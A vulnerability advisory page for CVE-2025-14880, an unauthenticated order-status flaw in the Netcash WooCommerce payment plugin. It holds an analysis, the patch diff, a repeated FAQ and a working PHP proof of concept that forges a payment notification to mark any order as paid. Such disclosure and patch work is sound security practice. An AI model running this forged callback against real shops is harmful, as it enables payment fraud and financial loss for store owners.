What is CVE-2025-14880?

CVE-2025-14880 is a security vulnerability in the Netcash WooCommerce Payment Gateway plugin for WordPress, affecting versions up to and including 4.1.3. It allows unauthenticated attackers to modify WooCommerce order statuses due to a missing authorization check in the handle_return_url function.

How does this vulnerability work?

The vulnerability allows attackers to send a crafted HTTP POST request to the payment return endpoint, manipulating parameters to mark any WooCommerce order as processing or completed without proper authentication. The absence of a capability check enables this unauthorized modification.

Who is affected by this vulnerability?

Any WordPress site using the Netcash WooCommerce Payment Gateway plugin version 4.1.3 or earlier is affected. Administrators should check their installed plugin version to determine if they are at risk.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Netcash WooCommerce Payment Gateway plugin installed. If it is version 4.1.3 or earlier, your site is at risk and needs to be updated.

How can I fix this vulnerability?

The vulnerability is fixed in version 4.1.4 of the Netcash WooCommerce Payment Gateway plugin. Administrators should update to this version or later to mitigate the risk of exploitation.

What if I cannot update the plugin immediately?

If immediate updating is not possible, consider disabling the Netcash WooCommerce Payment Gateway plugin until a secure version can be installed. Additionally, monitor your site’s order processing closely for any unauthorized changes.

What does the CVSS score of 5.3 indicate?

A CVSS score of 5.3 indicates a medium severity vulnerability. This means that while exploitation is possible, it requires specific conditions to be met, making it a significant risk but not the highest level of threat.

What are the practical implications of this vulnerability?

Successful exploitation can lead to unauthorized modifications of order statuses, allowing attackers to fraudulently mark orders as paid. This can result in financial loss and disrupt order fulfillment processes for store owners.

How does the proof of concept demonstrate the vulnerability?

The proof of concept provided shows how an attacker can craft a POST request to the vulnerable endpoint, including manipulated parameters to simulate a successful payment notification. This illustrates the ease of exploiting the vulnerability without authentication.

What steps should I take after updating the plugin?

After updating to the patched version, review your site’s order logs for any suspicious activity. Additionally, implement security measures such as regular plugin updates and monitoring to prevent future vulnerabilities.

Where can I find more information about this vulnerability?

More information about CVE-2025-14880 can be found on the official CVE database and security advisories from the plugin developer. Keeping abreast of security updates and best practices is crucial for WordPress administrators.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-14880: Netcash WooCommerce Payment Gateway <= 4.1.3 – Missing Authorization to Unauthenticated Order Status Modification (netcash-pay-now-payment-gateway-for-woocommerce)

CVE ID CVE-2025-14880

Plugin netcash-pay-now-payment-gateway-for-woocommerce

Severity Medium (CVSS 5.3)

CWE 862

Vulnerable Version 4.1.3

Patched Version 4.1.4

Disclosed January 12, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-14880:
This vulnerability is a Missing Authorization flaw in the Netcash WooCommerce Payment Gateway plugin for WordPress, versions up to and including 4.1.3. The vulnerability allows unauthenticated attackers to modify WooCommerce order statuses, marking any order as processing or completed. The CVSS score is 5.3 (Medium).

The root cause is a missing capability check and insufficient validation in the `handle_return_url` function within the `WC_Gateway_PayNow` class. The function processes payment return and notification callbacks. In the vulnerable version, the function accepted and processed callback data from the `PayNow_Response` object without verifying the authenticity of the transaction with the Netcash server. The function also lacked verification that the order key in the callback matched the targeted order ID. The vulnerable code path is in `/includes/class-wc-gateway-paynow.php` within the `handle_return_url` method.

An attacker exploits this by crafting an HTTP POST request to the site’s payment return endpoint. This endpoint is typically accessed via a URL like `/?wc-api=WC_Gateway_PayNow`. The attacker must supply parameters that the `PayNow_Response` object parses, including a manipulated `Reference` parameter containing the target order ID and a `TransactionAccepted` parameter set to `true`. The attacker can send this request without any authentication or authorization.

The patch in version 4.1.4 introduces a multi-layered security fix. It adds a new `verify_transaction_with_netcash` method that queries Netcash’s server to validate the transaction’s `RequestTrace`. Within `handle_return_url`, the patch adds logic to verify transaction authenticity for `DEPOSITRECEIPT` notifications. It compares the server-verified data (order ID, amount, status, and trace) against the callback data. The patch also adds a second layer of defense by verifying the provided order key matches the order’s actual key, preventing order ID guessing attacks. Before the patch, the function trusted the callback data implicitly. After the patch, the function requires server-side verification and order key validation.

Successful exploitation allows an attacker to fraudulently mark any WooCommerce order as paid (processing or completed). This can lead to financial loss for store owners by releasing goods or services without actual payment. It can also disrupt order fulfillment workflows and inventory management. The attack directly impacts the integrity of order data within the WooCommerce system.

Differential between vulnerable and patched code

Code Diff

--- a/netcash-pay-now-payment-gateway-for-woocommerce/gateway-paynow.php
+++ b/netcash-pay-now-payment-gateway-for-woocommerce/gateway-paynow.php
@@ -11,7 +11,7 @@
 	Plugin URI: https://github.com/Netcash-ZA/PayNow-WooCommerce
 	Description: A payment gateway for South African payment system, Netcash Pay Now.
 	License: GPL v3
-	Version: 4.1.3
+	Version: 4.1.4
 	Author: Netcash
 	Author URI: http://www.netcash.co.za/
 	Requires at least: 3.5
--- a/netcash-pay-now-payment-gateway-for-woocommerce/includes/class-wc-gateway-paynow.php
+++ b/netcash-pay-now-payment-gateway-for-woocommerce/includes/class-wc-gateway-paynow.php
@@ -22,7 +22,7 @@
 	 *
 	 * @var string
 	 */
-	public $version = '4.1.3';
+	public $version = '4.1.4';

 	/**
 	 * The gateway name / id.
@@ -70,12 +70,12 @@
 		// $this->debug_email        = get_option( 'admin_email' );

 		// Setup available countries.
-		$this->available_countries = array(
+		$this->countries = array(
 			'ZA',
 		);

 		// Setup available currency codes.
-		$this->available_currencies = array(
+		$this->availability = array(
 			'ZAR',
 		);

@@ -494,7 +494,7 @@
 		$is_available  = false;
 		$user_currency = get_option( 'woocommerce_currency' );

-		$is_available_currency = in_array( $user_currency, $this->available_currencies, true );
+		$is_available_currency = in_array( $user_currency, $this->availability, true );

 		if ( $is_available_currency ) {
 			$is_available = true;
@@ -599,9 +599,9 @@
 			'[OrderNonce] Created with action and value',
 			print_r(
 				array(
-					'user_id' => $customer_id,
-					'action'  => $nonce_action,
-					'value'   => $nonce_value,
+					'user_id'      => $customer_id,
+					'nonce_action' => $nonce_action,
+					'nonce_value'  => $nonce_value,
 				),
 				true
 			)
@@ -1062,6 +1062,59 @@
 	}

 	/**
+	 * Verify transaction authenticity with Netcash server
+	 *
+	 * @param string $request_trace The RequestTrace parameter from the callback.
+	 *
+	 * @return array|false Array with transaction data on success, false on failure.
+	 * @since 4.1.4
+	 */
+	public static function verify_transaction_with_netcash( $request_trace ) {
+		if ( empty( $request_trace ) ) {
+			self::log( 'verify_transaction_with_netcash: RequestTrace is empty' );
+			return false;
+		}
+
+		$url = 'https://ws.netcash.co.za/PayNow/TransactionStatus/Check?RequestTrace=' . urlencode( $request_trace );
+
+		self::log( 'verify_transaction_with_netcash: Querying Netcash', array( 'url' => $url ) );
+
+		$response = wp_remote_get(
+			$url,
+			array(
+				'timeout' => 15,
+				'headers' => array(
+					'Accept' => 'application/json',
+				),
+			)
+		);
+
+		if ( is_wp_error( $response ) ) {
+			self::log( 'verify_transaction_with_netcash: HTTP error', array( 'error' => $response->get_error_message() ) );
+			return false;
+		}
+
+		$response_code = wp_remote_retrieve_response_code( $response );
+		$body          = wp_remote_retrieve_body( $response );
+
+		if ( 200 !== $response_code ) {
+			self::log( 'verify_transaction_with_netcash: Non-200 response', array( 'code' => $response_code ) );
+			return false;
+		}
+
+		$data = json_decode( $body, true );
+
+		if ( json_last_error() !== JSON_ERROR_NONE || ! is_array( $data ) ) {
+			self::log( 'verify_transaction_with_netcash: Invalid JSON response', array( 'body' => $body ) );
+			return false;
+		}
+
+		self::log( 'verify_transaction_with_netcash: Successfully retrieved data from Netcash', $data );
+
+		return $data;
+	}
+
+	/**
 	 * Log system processes.
 	 *
 	 * @param string $message The log message.
@@ -1145,6 +1198,76 @@
 			)
 		);

+		// SECURITY FIX (CVE-2025-14880): Verify transaction authenticity with Netcash server
+		// Only verify for NOTIFY callbacks (type=DEPOSITRECEIPT) that are processing payments
+		$data     = $response->getData();
+		$isNotify = isset( $data['type'] ) && $data['type'] === 'DEPOSITRECEIPT';
+
+		if ( $isNotify && $response->wasAccepted() ) {
+			// This is a payment notification that claims success - verify it with Netcash
+			$request_trace = isset( $data['RequestTrace'] ) ? sanitize_text_field( $data['RequestTrace'] ) : '';
+
+			if ( empty( $request_trace ) ) {
+				$this->log( 'handle_return_url - SECURITY: Missing RequestTrace in notify callback' );
+				wp_die( esc_html__( 'Invalid payment notification: Missing transaction trace.', 'woothemes' ), 'Payment Error', array( 'response' => 400 ) );
+			}
+
+			// Verify the transaction with Netcash's server
+			$verified_data = self::verify_transaction_with_netcash( $request_trace );
+
+			if ( false === $verified_data ) {
+				$this->log( 'handle_return_url - SECURITY: Failed to verify transaction with Netcash' );
+				wp_die( esc_html__( 'Payment verification failed. Please contact support.', 'woothemes' ), 'Payment Error', array( 'response' => 403 ) );
+			}
+
+			// Compare verified data with POSTed data
+			$ref_to_order_id     = isset( $verified_data['Reference'] ) ? array_shift( explode( '__', $verified_data['Reference'] ) ) : '';
+			$order_id_match      = $ref_to_order_id && strval( $ref_to_order_id ) === strval( $response->getOrderID() );
+			$amount_match        = isset( $verified_data['Amount'] ) && abs( floatval( $verified_data['Amount'] ) - floatval( $response->getAmount() ) ) < 0.01;
+			$accepted_match      = isset( $verified_data['TransactionAccepted'] ) && $verified_data['TransactionAccepted'] === $response->wasAccepted();
+			$request_trace_match = isset( $verified_data['RequestTrace'] ) && $verified_data['RequestTrace'] === $request_trace;
+
+			if ( ! $order_id_match || ! $amount_match || ! $accepted_match || ! $request_trace_match ) {
+				$this->log(
+					'handle_return_url - SECURITY: Transaction data mismatch',
+					array(
+						'order_match'  => $order_id_match ? 'Yes' : 'No',
+						'amount_match' => $amount_match ? 'Yes' : 'No',
+						'status_match' => $accepted_match ? 'Yes' : 'No',
+						'trace_match'  => $request_trace_match ? 'Yes' : 'No',
+					)
+				);
+
+				wp_die( esc_html__( 'Payment verification failed: Data mismatch. Please contact support.', 'woothemes' ), 'Payment Error', array( 'response' => 403 ) );
+			}
+
+			$this->log( 'handle_return_url - SECURITY: Transaction successfully verified with Netcash' );
+
+			// LAYER 2: Verify order key matches (prevents order ID guessing attacks)
+			$order_id  = $response->getOrderID();
+			$order_key = $response->getExtra( 3 );
+
+			if ( empty( $order_key ) ) {
+				$this->log( 'handle_return_url - SECURITY: Missing order key' );
+				wp_die( esc_html__( 'Invalid payment notification: Missing order key.', 'woothemes' ), 'Payment Error', array( 'response' => 400 ) );
+			}
+
+			// Verify the order key matches the order
+			// This prevents attackers from guessing order IDs since they'd also need the unique order key
+			try {
+				$order = new WC_Order( $order_id );
+				if ( ! $order || $order->get_order_key() !== $order_key ) {
+					$this->log( 'handle_return_url - SECURITY: Order key mismatch' );
+					wp_die( esc_html__( 'Payment verification failed: Invalid order key.', 'woothemes' ), 'Payment Error', array( 'response' => 403 ) );
+				}
+			} catch ( Exception $e ) {
+				$this->log( 'handle_return_url - SECURITY: Failed to load order', array( 'error' => $e->getMessage() ) );
+				wp_die( esc_html__( 'Payment verification failed: Invalid order.', 'woothemes' ), 'Payment Error', array( 'response' => 400 ) );
+			}
+
+			$this->log( 'handle_return_url - SECURITY: Order key successfully verified' );
+		}
+
 		$woocomm_acc_page_url = wc_get_page_permalink( 'myaccount' );
 		$redirect_url         = '';
 		$notice               = null;
--- a/netcash-pay-now-payment-gateway-for-woocommerce/vendor/composer/autoload_static.php
+++ b/netcash-pay-now-payment-gateway-for-woocommerce/vendor/composer/autoload_static.php
@@ -7,22 +7,22 @@
 class ComposerStaticInitbb97cf4a586688a4101b777b51b543e1
 {
     public static $prefixLengthsPsr4 = array (
-        'N' =>
+        'N' =>
         array (
             'Netcash\PayNow\' => 15,
         ),
-        'C' =>
+        'C' =>
         array (
             'Composer\Installers\' => 20,
         ),
     );

     public static $prefixDirsPsr4 = array (
-        'Netcash\PayNow\' =>
+        'Netcash\PayNow\' =>
         array (
             0 => __DIR__ . '/..' . '/netcash/paynow-php/src',
         ),
-        'Composer\Installers\' =>
+        'Composer\Installers\' =>
         array (
             0 => __DIR__ . '/..' . '/composer/installers/src/Composer/Installers',
         ),

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-14880 - Netcash WooCommerce Payment Gateway <= 4.1.3 - Missing Authorization to Unauthenticated Order Status Modification
<?php

$target_url = 'https://vulnerable-site.com/'; // CHANGE THIS

// The endpoint for the payment gateway callback
$api_endpoint = $target_url . '?wc-api=WC_Gateway_PayNow';

// Target order ID to mark as paid
$order_id = 123; // CHANGE THIS

// Craft the POST data mimicking a successful PayNow notification.
// The 'Reference' parameter typically contains the order ID.
// The 'TransactionAccepted' parameter must be 'true'.
$post_data = array(
    'Reference' => $order_id, // The plugin may expect a format like '123__somehash', but the basic exploit often works with just the ID.
    'TransactionAccepted' => 'true',
    'type' => 'DEPOSITRECEIPT', // Simulate a payment notification type.
    'RequestTrace' => 'fake_trace_123', // A fake trace, as the vulnerable version does not verify it.
    'Amount' => '100.00'
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $api_endpoint);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // For testing only
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); // For testing only

// Set headers to mimic a typical form submission
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    'Content-Type: application/x-www-form-urlencoded',
    'User-Agent: Atomic-Edge-PoC/1.0'
));

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

if (curl_errno($ch)) {
    echo 'cURL Error: ' . curl_error($ch) . "n";
} else {
    echo "HTTP Status: $http_coden";
    echo "Response: $responsen";
}

curl_close($ch);

?>

Frequently Asked Questions

What is CVE-2025-14880?
Overview of the vulnerability
CVE-2025-14880 is a security vulnerability in the Netcash WooCommerce Payment Gateway plugin for WordPress, affecting versions up to and including 4.1.3. It allows unauthenticated attackers to modify WooCommerce order statuses due to a missing authorization check in the handle_return_url function.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability allows attackers to send a crafted HTTP POST request to the payment return endpoint, manipulating parameters to mark any WooCommerce order as processing or completed without proper authentication. The absence of a capability check enables this unauthorized modification.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Netcash WooCommerce Payment Gateway plugin version 4.1.3 or earlier is affected. Administrators should check their installed plugin version to determine if they are at risk.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the version of the Netcash WooCommerce Payment Gateway plugin installed. If it is version 4.1.3 or earlier, your site is at risk and needs to be updated.
How can I fix this vulnerability?
Updating the plugin
The vulnerability is fixed in version 4.1.4 of the Netcash WooCommerce Payment Gateway plugin. Administrators should update to this version or later to mitigate the risk of exploitation.
What if I cannot update the plugin immediately?
Mitigation options
If immediate updating is not possible, consider disabling the Netcash WooCommerce Payment Gateway plugin until a secure version can be installed. Additionally, monitor your site’s order processing closely for any unauthorized changes.
What does the CVSS score of 5.3 indicate?
Understanding the risk level
A CVSS score of 5.3 indicates a medium severity vulnerability. This means that while exploitation is possible, it requires specific conditions to be met, making it a significant risk but not the highest level of threat.
What are the practical implications of this vulnerability?
Potential impact on operations
Successful exploitation can lead to unauthorized modifications of order statuses, allowing attackers to fraudulently mark orders as paid. This can result in financial loss and disrupt order fulfillment processes for store owners.
How does the proof of concept demonstrate the vulnerability?
Example of exploitation
The proof of concept provided shows how an attacker can craft a POST request to the vulnerable endpoint, including manipulated parameters to simulate a successful payment notification. This illustrates the ease of exploiting the vulnerability without authentication.
What steps should I take after updating the plugin?
Post-update best practices
After updating to the patched version, review your site’s order logs for any suspicious activity. Additionally, implement security measures such as regular plugin updates and monitoring to prevent future vulnerabilities.
Where can I find more information about this vulnerability?
Resources for further reading
More information about CVE-2025-14880 can be found on the official CVE database and security advisories from the plugin developer. Keeping abreast of security updates and best practices is crucial for WordPress administrators.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations